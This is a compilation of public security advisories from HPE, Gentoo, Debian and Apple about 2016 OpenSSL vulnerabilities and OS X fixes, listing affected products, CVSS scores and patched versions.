The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data. OpenSSL is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. Following product versions are affected: OpenSSL versions 1.0.2 prior to 1.0.2h OpenSSL versions 1.0.1 prior to 1.0.1t. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03756en_us Version: 1
HPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-06-05 Last Updated: 2017-06-05
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE network products including Comware 7, iMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2016-2105 - Remote Denial of Service (DoS)
- CVE-2016-2106 - Remote Denial of Service (DoS)
- CVE-2016-2107 - Remote disclosure of sensitive information
- CVE-2016-2108 - Remote Denial of Service (DoS)
- CVE-2016-2109 - Remote Denial of Service (DoS)
- CVE-2016-2176 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HP Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2108
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-2176
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities in the Comware 7, iMC and VCX products running OpenSSL.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 10500 (Comware 7) - Version: R7184
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5900/5920 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR1000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR2000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR3000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR4000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- VSR (Comware 7) - Version: E0324
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7900 (Comware 7) - Version: R2152
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130 (Comware 7) - Version: R3115
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6125XLG - Version: R2422P02
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6127XLG - Version: R2422P02
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- Moonshot - Version: R2432
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 1950 (Comware 7) - Version: R3115
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7500 (Comware 7) - Version: R7184
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5510HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5940 - Version: R2509
- HP Network Products
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5950 - Version: R6123
- HP Network Products
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
- 12900E (Comware 7) - Version: R2609
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
iMC Products
- iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
- iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 2 June 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQEcBAEBCAAGBQJZNbF9AAoJELXhAxt7SZaiCmsH/373hRDLNeYxIUxMYvltF6m4 B8gU5WH4mos1K7St+PHPsGdDNop/MxjtLHFEyDkweGUIycA3saZzvf5v8T5BfY3Y ssa38vZUde1mC8RfIUKAcwo0xLqniZ5BU1fpG3bs+8qVafA7gr0i7mMvK+1M19cv dTkbirrP7fQ+2HGNpV3fQlvN3nz0KWI8OWBfFyWtWnYvt1rrzPJyWk08iMsFWUwC gYzNV38AzPPHcB7UeTnbOegL+nC3kM3VkDzhhs2pL15/ZRSlAv6I1tgcuA6YRVhQ wMFX9+LdSuLtDA2idUGgRhTe7lyNApUN0LRJ3nPzIcYXTlRYg3m5fkfmu1Q5KdM= =xlHZ -----END PGP SIGNATURE----- .
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Background
OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details. Additionally, a time based side-channel attack may allow a local attacker to recover a private DSA key.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-3566-1 security@debian.org https://www.debian.org/security/ Alessandro Ghedini May 03, 2016 https://www.debian.org/security/faq
Package : openssl CVE ID : CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2176
Several vulnerabilities were discovered in OpenSSL, a Secure Socket Layer toolkit. This could lead to a heap corruption. This could lead to a heap corruption.
CVE-2016-2107
Juraj Somorovsky discovered a padding oracle in the AES CBC cipher
implementation based on the AES-NI instruction set. This could allow
an attacker to decrypt TLS traffic encrypted with one of the cipher
suites based on AES CBC.
CVE-2016-2108
David Benjamin from Google discovered that two separate bugs in the
ASN.1 encoder, related to handling of negative zero integer values
and large universal tags, could lead to an out-of-bounds write.
For the unstable distribution (sid), these problems have been fixed in version 1.0.2h-1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004
OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:
apache_mod_php
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
Description: Multiple issues existed in PHP versions prior to
5.5.36. These were addressed by updating PHP to version 5.5.36.
CVE-2016-4650
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher
CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo
Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher
IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins
IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher
